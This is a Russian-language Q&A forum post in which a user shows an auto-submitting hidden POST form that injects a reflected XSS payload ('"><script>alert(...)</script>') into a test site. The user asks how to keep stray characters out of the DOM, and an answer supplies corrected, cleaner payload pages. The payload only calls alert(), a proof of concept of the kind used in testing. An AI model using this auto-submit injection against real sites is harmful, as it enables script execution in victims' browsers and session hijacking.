XSS: отображение персонажа в DOM - PullRequest
0 голосов
/ 12 апреля 2019

Я создал html-страницу, которая перенаправляет пользователя на тестовый сайт с XSS-уязвимостью. Я могу успешно выполнить JavaScript с помощью уязвимости. Однако я обнаружил, что некоторые символы, которые я использую для атаки XSS, отображаются в DOM. Как я могу скрыть эти символы от показа в DOM?

<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input 
        type="hidden"
        name="login"
        value='"><script>alert(document.location)</script>'
      </input>
    </form>
  </body>

1 Ответ

0 голосов
/ 12 апреля 2019

Ошибка опечатки value='" и удалить последнюю ' />

<form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value="" /><script>alert(3)</script>
    </form>

<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value=""><script>alert(3)</script>
    </form>
  </body>
...